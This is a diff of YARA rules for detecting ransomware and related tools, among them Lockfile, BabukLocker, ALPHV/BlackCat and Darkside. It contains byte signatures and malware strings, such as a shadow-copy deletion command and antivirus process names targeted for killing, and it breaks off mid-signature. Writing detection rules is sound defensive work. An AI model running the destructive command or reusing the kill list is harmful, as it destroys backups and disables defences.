"Arkbird_SOLG" - id = "80bf5286-6da6-5380-ad14-345d8122d3d4" - date = "2021-08-28" - modified = "2021-08-29" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_Kernel_Driver_Aug_2021_1.yara#L1-L21" + id = "a3bad41d-59fb-564f-a352-ca38af582c08" + date = "2020-01-03" + modified = "2021-01-03" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-02/BabukLocker/Ran_BabukLockers_Jan_2021_1.yar#L1-L23" license_url = "N/A" - logic_hash = "225bd5995d3f1ed4c0bcb43c862662c9e5badd96a87d779d3bc6f1809d0ce3bb" - score = 75 - quality = 50 + logic_hash = "8939e408948dd7b17acdac5c6b5f50db24ec63f19937b8663a15f52b678d0065" + score = 50 + quality = 75 tags = "FILE" - hash1 = "5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f" - hash2 = "0d18c704049700efd1353055b604072d94bcc3e5f4aa558adf8b8f8848330644" - hash3 = "2b7ffe47b3fabf81a76386ee953d281aeaa158f4926896fcc1425c3844e73597" - hash4 = "61423a95146d5fca47859e43d037944edb32f2004d86e14c7a522270bde6e2a8f" - adversary = "Lockfile" + hash1 = "8203c2f00ecd3ae960cb3247a7d7bfb35e55c38939607c85dbdb5c92f0495fa9" + level = "Experimental" strings: - $s1 = "\\BaseNamedObjects\\{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword wide - $s2 = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Services\\%ws" fullword wide - $s3 = "\\DosDevices\\%wS" fullword wide - $s4 = "%temp%\\" fullword wide - $s5 = { 5b 2b 5d 20 50 72 6f 63 65 73 73 20 6f 62 6a 65 63 74 20 28 45 50 52 4f 43 45 53 53 29 20 66 6f 75 6e 64 2c 20 30 78 25 6c 6c 58 0d 0a 00 00 00 5b 2b 5d 20 45 50 52 4f 43 45 53 53 2d 3e 50 53 5f 50 52 4f 54 45 43 54 49 4f 4e 2c 20 30 78 25 6c 6c 58 } - $s6 = { 48 8b 4e 20 41 b9 00 08 00 00 4d 8b c7 49 8b d5 41 ff 54 24 70 85 c0 75 09 48 8d 15 [2] 02 00 eb 49 48 8d 0d [2] 02 00 e8 b9 ef ff ff 48 8d 0d [2] 02 00 e8 ad ef ff ff 4c 8d 85 f0 02 00 00 ba 00 00 00 c0 48 8d 0d [2] 02 00 e8 [2] 00 00 ba d0 07 00 00 49 8b ce ff 15 [2] 01 00 85 c0 74 15 48 8d 15 [2] 02 00 b9 01 00 00 00 e8 [2] 00 00 33 db eb 0b 48 8b d7 48 8b ce e8 4b f3 ff ff 49 8b ce ff 15 } + $seq1 = { 55 8b ec 83 ec 14 a1 b0 81 40 00 33 c5 89 45 fc c7 45 f8 ff ff ff ff c7 45 f4 00 40 00 00 8d 45 f0 50 8b 4d 08 51 6a 13 6a 00 6a 02 e8 85 2b 00 00 85 c0 0f 85 a3 00 00 00 8b 55 f4 52 e8 ae 06 00 00 83 c4 04 89 45 08 83 7d 08 00 0f 84 81 00 00 00 8d 45 f4 50 8b 4d 08 51 8d 55 f8 52 8b 45 f0 50 e8 55 2b 00 00 85 c0 75 5c c7 45 ec 00 00 00 00 eb 09 8b 4d ec 83 c1 01 89 4d ec 8b 55 ec 3b 55 f8 73 40 8b 45 ec c1 e0 05 8b 4d 08 8b 54 01 0c 83 e2 02 74 14 8b 45 ec c1 e0 05 03 45 } + $seq2 = { 68 68 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 01 00 00 00 eb 58 68 74 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0c c7 85 b0 fd ff ff 00 00 00 00 eb 2b 68 80 22 40 00 b8 04 00 00 00 c1 e0 00 8b 8d 9c fd ff ff 8b 14 01 52 ff 15 b8 90 40 00 85 c0 75 0a c7 85 b0 fd ff ff ff ff ff ff e9 55 ff ff ff 6a 00 6a 00 ff 15 a8 90 40 00 e8 aa 04 00 00 e8 05 } + $seq3 = { 83 c4 0c 68 f4 00 00 00 8d 85 f4 fd ff ff 50 68 88 22 40 00 ff 15 6c 90 40 00 68 98 22 40 00 8d 8d f4 fd ff ff 51 ff 15 c4 90 40 00 c7 85 ec fd ff ff 00 00 00 00 6a 00 68 80 00 00 00 6a 01 6a 00 6a 01 68 00 00 00 40 8d 95 f4 fd ff ff 52 ff 15 70 90 40 00 89 85 98 fd ff ff 83 bd 98 fd ff ff ff 0f 84 2e 03 00 00 6a 00 8d 85 ec fd ff ff 50 68 90 00 00 00 68 78 82 40 00 8b 8d 98 fd ff ff 51 ff 15 90 90 } + $s1 = "\\ecdh_pub_k.bin" fullword wide + $s2 = "ntuser.dat.log" fullword wide + $s3 = "cmd.exe" fullword ascii + $s4 = "/c vssadmin.exe delete shadows /all /quiet" fullword wide + $s5 = { 5c 00 5c 00 3f 00 5c 00 00 00 00 00 3a 00 00 00 98 2f } condition: - uint16(0)==0x5a4d and filesize >10KB and all of ($s*) + uint16(0)==0x5a4d and filesize >15KB and 2 of ($seq*) and 3 of ($s*) } -rule ARKBIRD_SOLG_Tool_Efspotatoe_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ALPHV_Dec_2021_1 : FILE { meta: - description = "Detect custom .NET variant EFSPotatoe tool" + description = "Detect AlphV ransomware (Nov and Dec 2021)" author = "Arkbird_SOLG" - id = "614a6543-89ce-5f75-9933-766fd1e5458b" - date = "2021-08-27" - modified = "2021-08-29" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/Tool_EFSPotatoe_Aug_2021_1.yara#L1-L19" + id = "5c758dc9-b1dc-58e0-b443-6f78e27ffefe" + date = "2021-12-09" + modified = "2021-12-18" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-09/RAN_ALPHV_Dec_2021_1.yara#L1-L21" license_url = "N/A" - logic_hash = "a9fed543aeaba380688ec59034b0e8c90fc0bea986085958966101bd44cf480f" + logic_hash = "416ebea98f660dd9fad27c3be0c79e47bc69e08fe4be7db76a71462d2c5ada49" score = 75 quality = 75 tags = "FILE" - hash1 = "c372c54b11465688201e2d48ffd5fd5b0ca49360858a70ce8413f5c9e24c8050" - hash2 = "441cb0576151b2e5b5127be72a5bcdf3577a596f0a4e1f2c6836248fe07eb818" - adversary = "Lockfile" + hash1 = "3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83" + hash2 = "7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e" + hash3 = "cefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae" + hash4 = "731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161" + tlp = "white" + adversary = "BlackCat" strings: - $s1 = { 5c 00 70 00 69 00 70 00 65 00 5c 00 6c 00 73 00 61 00 72 00 70 00 63 } - $s2 = "ncacn_np" fullword wide - $s3 = "WinSta0\\Default" fullword wide - $s4 = { 11 00 72 cc 01 00 70 28 06 00 00 0a 00 dd de 02 00 00 00 de 12 07 14 fe 01 13 0f 11 0f 2d 07 07 6f 0f 00 00 0a 00 dc 00 28 10 00 00 0a 13 10 12 10 72 16 02 00 70 28 11 00 00 0a 0d 72 1a 02 00 70 09 72 2e 02 00 70 28 12 00 00 0a 13 04 11 04 19 16 1f 0a 20 00 08 00 00 20 00 08 00 00 16 7e 0d 00 00 0a 28 06 00 00 06 13 05 11 05 15 73 13 00 00 0a 28 14 00 00 0a 16 fe 01 13 0f 11 0f 2d 25 00 72 48 02 00 70 28 0e 00 00 0a 73 15 00 00 0a 6f 16 00 00 0a 28 0a 00 00 0a 28 06 00 00 0a 00 38 4a 02 00 00 16 73 17 00 00 0a 13 06 14 fe 06 04 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 07 11 07 17 6f 1a 00 00 0a 00 11 07 18 8d 01 00 00 01 13 11 11 11 16 11 05 8c 15 00 00 01 a2 11 11 17 11 06 a2 11 11 6f 1b 00 00 0a 00 14 fe 06 03 00 00 06 73 18 00 00 0a 73 19 00 00 0a 13 08 11 08 17 6f 1a 00 00 0a 00 11 08 09 6f 1b 00 00 0a 00 11 06 20 e8 03 00 00 6f 1c 00 00 0a 16 fe 01 13 0f 11 0f 3a 93 01 00 00 00 11 05 28 08 00 00 06 16 fe 01 13 0f 11 0f 3a 7c 01 00 00 00 28 08 00 00 0a 6f 0b 00 00 0a 13 09 72 7c 02 00 70 11 09 8c 15 00 00 01 28 1d 00 00 0a 28 06 00 00 0a 00 12 0a fe 15 08 00 00 02 12 0a 11 0a 28 02 00 00 2b 7d 1d 00 00 04 12 0a 7e 0d 00 00 0a 7d 1e 00 00 04 12 0a 17 7d 1f 00 00 04 12 0b 12 0c 12 0a 20 00 04 00 00 28 0b 00 00 06 26 12 0d fe 15 06 00 00 02 12 0e fe 15 07 00 00 02 12 0e 11 0e 28 03 00 00 2b 7d 0b 00 00 04 12 0e 11 0c 7d 1c 00 00 04 12 0e 11 0c 7d 1b 00 00 04 12 0e 72 9c 02 00 70 7d 0d 00 00 04 12 0e 20 01 01 00 00 7d 16 00 00 04 12 0e 16 7d 17 00 00 04 } - $s5 = "EfsPotato <cmd>" wide - $s6 = "\\\\.\\pipe\\" wide + $s1 = { ff b4 24 [2] 00 00 6a 00 ff 35 ?? e1 ?? 00 e8 [3] 00 8d 8c 24 [2] 00 00 ba [3] 00 68 c0 1f 00 00 e8 [3] ff 83 c4 04 ?? bc 24 [2] 00 00 } + $s2 = { 85 f6 74 47 8b 3d ?? e1 ?? 00 85 ff 0f 85 81 00 00 00 eb 60 68 [3] 00 6a 00 6a 00 e8 [2] 04 00 85 c0 0f 84 99 01 00 00 89 c1 31 c0 f0 0f b1 0d ?? e1 ?? 00 0f 84 f0 fe ff ff 89 c6 51 e8 [2] 04 00 89 f1 e9 e1 fe ff ff 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 32 03 00 00 89 c6 a3 ?? e1 ?? 00 8b 3d ?? e1 ?? 00 85 ff 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 09 03 00 00 89 c7 a3 ?? e1 ?? 00 89 74 24 18 e8 [2] 04 00 8b 35 ?? e1 ?? 00 89 44 24 14 85 f6 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 b8 01 00 00 89 c6 a3 ?? e1 ?? 00 8d 44 24 70 c7 44 24 64 00 00 00 00 c7 44 24 60 00 00 00 00 68 0c 01 00 00 6a 00 50 e8 [2] 04 00 83 } + $s3 = { 8b 38 89 4d ec 89 55 ?? 74 34 a1 ?? e1 ?? 00 85 c0 75 0e e8 [3] 00 85 c0 74 14 a3 ?? e1 ?? 00 53 6a 00 50 e8 [3] 00 89 c6 85 c0 75 13 89 d9 ba 01 00 00 00 e8 [3] ff 0f 0b be 01 00 00 00 53 57 56 e8 [3] 00 83 c4 0c 8d 04 1e 8d 4d } + $s4 = { 83 c4 0c c7 45 ?? 00 00 00 00 c7 45 ?? 02 00 00 89 89 75 ?? 8d 45 ?? c7 45 ?? 00 00 00 00 c7 45 ?? 00 00 00 00 6a 10 50 57 e8 [3] 00 83 f8 ff 0f 84 ?? 02 00 00 f6 45 9c ff } condition: - uint16(0)==0x5a4d and filesize >10KB and 5 of ($s*) + uint16(0)==0x5A4D and filesize >300KB and all of ($s*) } -rule ARKBIRD_SOLG_MAL_Killproc_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELF_Darkside_Apr_2021_1 : FILE { meta: - description = "Detect KillProc driver used by Night Dragon for kill process before encryption" + description = "Detect the ELF version of Darkside ransomware" author = "Arkbird_SOLG" - id = "b0d6a21d-f451-58c9-b640-ad57feec7c38" - date = "2021-08-27" - modified = "2021-08-29" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/MAL_KillProc_Aug_2021_1.yara#L1-L21" + id = "10c0ba57-d6d6-5d1d-bd2a-f6f240d71f8b" + date = "2021-05-01" + modified = "2021-05-02" + reference = "https://twitter.com/JAMESWT_MHT/status/1388301138437578757" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-01/Darkside/RAN_ELF_Darkside_Apr_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "d24634e7719e3b6be3322b07c3e754e8c1275c73102c6d7f8d9abaae9887a0da" + logic_hash = "510932893e1e81d6c88e86c7ae2345460b397c936336c7e1a33799dbc1dd6aab" score = 75 quality = 75 tags = "FILE" - hash1 = "36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9" - adversary = "Lockfile" + hash1 = "984ce69083f2865ce90b48569291982e786980aeef83345953276adfcbbeece8" + hash2 = "9cc3c217e3790f3247a0c0d3d18d6917701571a8526159e942d0fffb848acffb" + hash3 = "c93e6237abf041bc2530ccb510dd016ef1cc6847d43bf023351dce2a96fdc33b" + tlp = "White" + adversary = "-" strings: - $s1 = "find %s!\n" fullword ascii - $s2 = "killed %s!\n" fullword ascii - $s3 = "DbgPrint" fullword ascii - $s4 = "ntoskrnl.exe" fullword ascii - $s5 = "SBPIMSvc.exe" fullword ascii - $s6 = "MsMpEng.exe" fullword ascii - $s7 = { 48 8b ce ff 15 92 cf ff ff 48 8b d0 48 8b cb ff 15 8e cf ff ff 48 8d 7f 08 85 c0 74 0d 48 8b 1f 44 38 23 75 db e9 a7 00 00 00 48 8b ce ff 15 68 cf ff ff 48 8b d0 48 8d 0d 6e bf ff ff ff 15 70 cf ff ff 48 8b ce ff 15 37 cf ff ff 8b c8 48 8d 54 24 40 ff 15 3a cf ff ff 85 c0 78 56 48 8b 4c 24 40 48 8d 84 24 a8 00 00 00 48 89 44 24 30 45 33 c9 44 88 64 24 28 45 33 c0 33 d2 4c 89 64 24 20 ff 15 04 cf ff ff 85 c0 74 05 45 32 f6 eb 41 48 8b 8c 24 a8 00 00 00 33 d2 ff 15 0b cf ff ff 48 8b 8c 24 a8 00 00 00 ff 15 0d cf ff ff 41 b6 01 eb 05 45 84 f6 74 19 48 8b ce ff 15 da ce ff ff 48 8b d0 48 8d 0d f0 be ff ff ff 15 e2 ce ff ff 48 8b ce ff 15 a1 ce ff ff 48 83 } - $s8 = "UpdaterUI.exe" fullword ascii - $s9 = "VipreNis.exe" fullword ascii + $seq1 = { 48 8d 3d d1 e8 3b 00 e8 9c 51 f2 ff 85 c0 74 c6 4c 8d 6c 24 10 4c 89 ef e8 ab bf 02 00 48 8d 1d 34 bb 37 00 49 8d 75 08 48 8d 3d 31 e1 3b 00 48 8d 43 10 48 89 05 1e e1 3b 00 e8 09 1e 02 00 48 8d 05 22 d8 0e 00 48 8b 7c 24 18 c7 05 4b e1 3b 00 01 00 00 00 48 89 05 1c e1 3b 00 48 8d 05 4d d8 0e 00 48 85 ff 48 89 05 13 e1 3b 00 48 8d 05 84 d8 0e 00 48 89 05 0d e1 3b 00 48 8d 05 be d8 0e 00 48 89 05 07 e1 3b 00 48 8d 05 48 d9 0e 00 48 89 05 01 e1 3b 00 48 8d 43 10 48 89 44 24 10 74 05 e8 21 45 f2 ff 4c 8d ac 24 30 03 00 00 4c 89 ef e8 11 bf 02 00 4c 8d b4 24 10 03 00 00 ba 03 00 00 00 4c 89 ee 4c 89 f7 e8 39 62 ff ff 48 8b bc 24 38 03 00 00 48 8d 43 10 48 89 84 24 30 03 00 00 48 85 ff 74 05 e8 db 44 f2 ff 4c 8d 6c 24 30 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 06 62 ff ff 48 8b bc 24 18 03 00 00 48 8d 43 10 48 89 84 24 10 03 00 00 48 85 ff 74 05 e8 a8 44 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 81 e0 3b 00 48 89 05 72 e0 3b 00 e8 0d 1d 02 00 48 8d 05 26 d7 0e 00 48 8b 7c 24 38 c7 05 9f e0 3b 00 01 00 00 00 48 89 05 70 e0 3b 00 48 8d 05 51 d7 0e 00 48 85 ff 48 89 05 67 e0 3b 00 48 8d 05 88 d7 0e 00 48 89 05 61 e0 3b 00 48 8d 05 c2 d7 0e 00 48 89 05 5b e0 3b 00 48 8d 05 4c d8 0e 00 48 89 05 55 e0 3b 00 48 8d 43 10 48 89 44 24 30 74 05 e8 25 44 f2 ff 4c 8d b4 24 50 03 00 00 4c 89 f7 e8 05 c5 02 00 4c 8d 6c 24 50 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 40 61 ff ff 48 8b bc 24 58 03 00 00 48 8d 43 10 48 89 84 24 50 03 00 00 48 85 ff 74 05 e8 e2 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 0b e0 3b 00 48 89 05 fc df 3b 00 e8 47 1c 02 00 48 8d 05 18 d8 0e 00 48 8b 7c 24 58 c7 05 29 e0 3b 00 01 00 00 00 48 89 05 fa df 3b 00 48 8d 05 33 d8 0e 00 48 85 ff 48 89 05 f1 df 3b 00 48 8d 05 5a d8 0e 00 48 89 05 eb df 3b 00 48 8d 05 84 d8 0e 00 48 89 05 e5 df 3b 00 48 8d 05 de d8 0e 00 48 89 05 df df 3b 00 48 8d 43 10 48 89 44 24 50 74 05 e8 5f 43 f2 ff 4c 8d b4 24 70 03 00 00 4c 89 f7 e8 3f c4 02 00 4c 8d 6c 24 70 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 7a 60 ff ff 48 8b bc 24 78 03 00 00 48 8d 43 10 48 89 84 24 70 03 00 00 48 85 ff 74 05 e8 1c 43 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 95 df 3b 00 48 89 05 86 df 3b 00 e8 81 1b 02 00 48 8d 05 9a d8 0e 00 48 8b 7c 24 78 c7 05 b3 df 3b 00 01 00 00 00 48 89 05 84 df 3b 00 48 8d 05 c5 d8 0e 00 48 85 ff 48 89 05 7b df 3b 00 48 8d 05 fc d8 0e 00 48 89 05 75 df 3b 00 48 8d 05 36 d9 0e 00 48 89 05 6f df 3b 00 48 8d 05 b0 d9 0e 00 48 89 05 69 df 3b 00 48 8d 43 10 48 89 44 24 70 74 05 e8 99 42 f2 ff 4c 8d ac 24 90 03 00 00 4c 89 ef e8 19 be 02 00 4c 8d b4 24 b0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 b1 5f ff ff 4c 8d ac 24 90 00 00 00 ba 01 00 00 00 4c 89 f6 4c 89 ef e8 99 5f ff ff 48 8b bc 24 b8 03 00 00 48 8d 43 10 48 89 84 24 b0 03 00 00 48 85 ff 74 05 e8 3b 42 f2 ff 48 8b bc 24 98 03 00 00 48 8d 43 10 48 89 84 24 90 03 00 00 48 85 ff 74 05 e8 1d 42 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d e6 de 3b 00 48 89 05 d7 de 3b 00 e8 82 1a 02 00 48 8d 05 43 d9 0e 00 48 8b bc 24 98 00 00 00 c7 05 01 df 3b 00 01 00 00 00 48 89 05 d2 de 3b 00 48 8d 05 53 d9 0e 00 48 85 ff 48 89 05 c9 de 3b 00 48 8d 05 72 d9 0e 00 48 89 05 c3 de 3b 00 48 8d 05 94 d9 0e 00 48 89 05 bd de 3b 00 48 8d 05 de d9 0e 00 48 89 05 b7 de 3b 00 48 8d 43 10 48 89 84 24 90 00 00 00 74 05 e8 94 41 f2 ff 4c 8d ac 24 d0 03 00 00 4c 89 ef e8 14 bd 02 00 4c 8d b4 24 f0 03 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 ac 5e ff ff 4c 8d ac 24 b0 00 00 00 ba 03 00 00 00 4c 89 f6 4c 89 ef e8 94 5e ff ff 48 8b bc 24 f8 03 00 00 48 8d 43 10 48 89 84 24 f0 03 00 00 48 85 ff 74 05 e8 36 41 f2 ff 48 8b bc 24 d8 03 00 00 48 8d 43 10 48 89 84 24 d0 03 00 00 48 85 ff 74 05 e8 18 41 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 31 de 3b 00 48 89 05 22 de 3b 00 e8 7d 19 02 00 48 8d 05 56 d9 0e 00 48 8b bc 24 b8 00 00 00 c7 05 4c de 3b 00 01 00 00 00 48 89 05 1d de 3b 00 48 8d 05 6e d9 0e 00 48 85 ff 48 89 05 14 de 3b 00 48 8d 05 95 d9 0e 00 48 89 05 0e de 3b 00 48 8d 05 bf d9 0e 00 48 89 05 08 de 3b 00 48 8d 05 19 da 0e 00 48 89 05 02 de 3b 00 48 8d 43 10 48 89 84 24 b0 00 00 00 74 05 e8 8f 40 f2 ff 4c 8d ac 24 10 04 00 00 4c 89 ef e8 0f bc 02 00 4c 8d b4 24 30 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a7 5d ff ff 4c 8d ac 24 d0 00 00 00 ba 05 00 00 00 4c 89 f6 4c 89 ef e8 8f 5d ff ff 48 8b bc 24 38 04 00 00 48 8d 43 10 48 89 84 24 30 04 00 00 48 85 ff 74 05 e8 31 40 f2 ff 48 8b bc 24 18 04 00 00 48 8d 43 10 48 89 84 24 10 04 00 00 48 85 ff 74 05 e8 13 40 f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d 7c dd 3b 00 48 89 05 6d dd 3b 00 e8 78 18 02 00 48 8d 05 99 d9 0e 00 48 8b bc 24 d8 00 00 00 c7 05 97 dd 3b 00 01 00 00 00 48 89 05 68 dd 3b 00 48 8d 05 b9 d9 0e 00 48 85 ff 48 89 05 5f dd 3b 00 48 8d 05 e8 d9 0e 00 48 89 05 59 dd 3b 00 48 8d 05 1a da 0e 00 48 89 05 53 dd 3b 00 48 8d 05 84 da 0e 00 48 89 05 4d dd 3b 00 48 8d 43 10 48 89 84 24 d0 00 00 00 74 05 e8 8a 3f f2 ff 4c 8d ac 24 50 04 00 00 4c 89 ef e8 0a bb 02 00 4c 8d b4 24 70 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 a2 5c ff ff 4c 8d ac 24 f0 00 00 00 ba 07 00 00 00 4c 89 f6 4c 89 ef e8 8a 5c ff ff 48 8b bc 24 78 04 00 00 48 8d 43 10 48 89 84 24 70 04 00 00 48 85 ff 74 05 e8 2c 3f f2 ff 48 8b bc 24 58 04 00 00 48 8d 43 10 48 89 84 24 50 04 00 00 48 85 ff 74 05 e8 0e 3f f2 ff 48 8d 43 10 49 8d 75 08 48 8d 3d c7 dc 3b 00 48 89 05 b8 dc 3b 00 e8 73 17 02 00 48 8d 05 0c da 0e 00 48 8b bc 24 f8 00 00 00 c7 05 e2 dc 3b 00 01 00 00 00 48 89 05 b3 dc 3b 00 48 8d 05 34 da 0e 00 48 85 ff 48 89 05 aa dc 3b 00 48 8d 05 6b da 0e 00 48 89 05 a4 dc 3b 00 48 8d 05 a5 da 0e 00 48 89 05 9e dc 3b 00 48 8d 05 1f db 0e 00 48 89 05 98 dc 3b 00 48 8d 43 10 48 89 84 24 f0 00 00 00 74 05 e8 85 3e f2 ff 4c 8d ac 24 90 04 00 00 4c 89 ef e8 05 ba 02 00 4c 8d b4 24 b0 04 00 00 ba 01 00 00 00 4c 89 ee 4c 89 f7 e8 9d 5b ff ff 4c 8d ac 24 10 01 00 00 ba 09 00 00 00 4c 89 f6 4c 89 ef e8 85 5b ff ff 48 8b bc 24 b8 04 00 00 48 8d 43 10 48 89 84 24 b0 04 00 00 48 85 ff 74 05 e8 27 3e f2 ff 48 8b bc 24 98 04 00 00 48 8d 43 10 48 89 84 24 90 04 00 00 48 85 ff 74 05 e8 09 3e f2 ff 48 8d 43 10 49 8d } + $seq2 = { 41 56 49 89 fe 41 55 41 89 cd 41 54 45 8d 60 01 55 53 44 89 c3 48 81 ec 98 06 00 00 41 39 cc 89 74 24 10 48 89 54 24 30 0f 84 ab 09 00 00 48 8d 84 24 80 00 00 00 41 8d 70 ff 48 8d ac 24 10 01 00 00 48 89 c7 48 89 44 24 48 e8 0f 89 f6 ff be 01 00 00 00 48 89 ef e8 02 51 f6 ff 4c 8d a4 24 e0 00 00 00 89 de 4c 89 e7 e8 f0 88 f6 ff 48 8d 84 24 b0 00 00 00 48 89 ea 4c 89 e6 48 89 c7 48 89 44 24 20 e8 55 8d f6 ff 48 8d 1d 4e a2 2f 00 49 8d 7c 24 08 4c 8d 7b 10 4c 89 bc 24 e0 00 00 00 e8 48 eb ea ff 48 8d 7d 08 4c 89 bc 24 10 01 00 00 e8 37 eb ea ff 48 8d 84 24 40 01 00 00 41 8d 75 ff 48 89 c7 48 89 44 24 38 e8 8e 88 f6 ff 48 8d 84 24 d0 01 00 00 be 01 00 00 00 48 89 c7 49 89 c7 48 89 44 24 50 e8 71 50 f6 ff 48 8d ac 24 a0 01 00 00 44 89 ee 48 89 ef e8 5e 88 f6 ff 48 8d 84 24 70 01 00 00 4c 89 fa 48 89 ee 48 89 c7 48 89 44 24 40 e8 c3 8c f6 ff 4c 8d 63 10 48 8d 7d 08 48 8d ac 24 00 02 00 00 4c 89 a4 24 a0 01 00 00 e8 b6 ea ea ff 4c 89 ff 4c 89 a4 24 d0 01 00 00 4c 8d a4 24 30 02 00 00 48 83 c7 08 e8 9a ea ea ff 4c 63 7c 24 10 49 8d 46 30 48 89 44 24 18 0f 1f 40 00 e8 b3 7c f6 ff 49 89 c5 e8 ab 75 f6 ff 4c 89 2c 24 4c 8b 6c 24 18 49 89 c1 48 8b 4c 24 20 48 8b 54 24 48 41 b8 01 00 00 00 48 8b 74 24 30 4c 89 ef e8 32 f9 f6 ff 4c 89 fe 48 89 ef e8 b7 4f f6 ff 4c 89 ea 48 89 ee 4c 89 e7 e8 09 d9 f6 ff 48 8b 4c 24 40 48 8b 54 24 38 4d 89 e1 48 8b 74 24 30 4c 89 2c 24 41 b8 01 00 00 00 4c 89 f7 e8 f5 f8 f6 ff 48 8b 94 24 50 02 00 00 48 8b 8c 24 40 02 00 00 41 89 c5 48 39 8c 24 48 02 00 00 48 8d 43 10 48 0f 46 8c 24 48 02 00 00 48 85 d2 48 89 84 24 30 02 00 00 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 40 4f f7 ff 48 8b 94 24 20 02 00 00 48 8b 8c 24 10 02 00 00 48 8d 43 10 48 39 8c 24 18 02 00 00 48 0f 46 8c 24 18 02 00 00 48 89 84 24 00 02 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 fe 4e f7 ff 45 84 ed 0f 84 fd fe ff ff 83 7c 24 10 01 0f 84 bc 04 00 00 48 8d 84 24 e0 03 00 00 4c 8d ac 24 c0 05 00 00 48 89 44 24 10 48 8d 84 24 10 04 00 00 48 89 44 24 08 49 8d 45 08 } + $seq3 = { 4c 8d bc 24 00 05 00 00 be 01 00 00 00 4c 89 ff e8 9b 4e f6 ff 4c 8d a4 24 30 05 00 00 4c 89 fa 4c 89 f6 4c 89 e7 e8 05 88 f6 ff 48 8d ac 24 60 05 00 00 48 8b 54 24 18 4c 89 e6 48 89 ef e8 5d d3 f6 ff 48 8d 84 24 90 05 00 00 4c 89 f1 4c 89 ea 48 89 ee 48 89 c7 48 89 44 24 28 e8 ef b9 ff ff 48 8b 74 24 28 49 8d 7e 60 e8 01 59 f6 ff 48 8b 94 24 b0 05 00 00 48 8b 8c 24 a0 05 00 00 48 8d 43 10 48 39 8c 24 a8 05 00 00 48 0f 46 8c 24 a8 05 00 00 48 89 84 24 90 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 ff 4d f7 ff 48 8b 94 24 80 05 00 00 48 8b 8c 24 70 05 00 00 48 8d 43 10 48 39 8c 24 78 05 00 00 48 0f 46 8c 24 78 05 00 00 48 89 84 24 60 05 00 00 48 85 d2 74 10 48 89 d7 31 c0 f3 48 ab 48 89 d7 e8 bd 4d f7 ff 48 8b 94 24 50 05 00 00 48 8b 8c 24 40 05 00 00 48 8d 43 10 48 39 8c 24 48 05 00 00 48 0f 46 8c 24 48 05 00 00 48 89 84 24 30 05 00 00 } + $seq4 = { 49 89 ff 41 56 49 89 f6 41 55 41 54 55 53 49 8d 9e c8 01 00 00 48 81 ec f8 05 00 00 48 8d bc 24 d0 00 00 00 e8 e5 52 00 00 48 8d bc 24 00 01 00 00 be 06 0e 5d 00 e8 33 99 ff ff 48 8d b4 24 00 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 bb eb ff ff 48 8b 84 24 00 01 00 00 48 8d b4 24 60 04 00 00 49 8d 9e c0 01 00 00 48 8d 78 e8 e8 9b 10 fd ff 48 8d bc 24 20 01 00 00 be 79 e3 5b 00 e8 e9 98 ff ff 48 8d b4 24 20 01 00 00 48 8d bc 24 d0 00 00 00 48 89 da e8 71 eb ff ff 48 8b 84 24 20 01 00 00 48 8d b4 24 60 04 00 00 48 8d 78 e8 e8 58 10 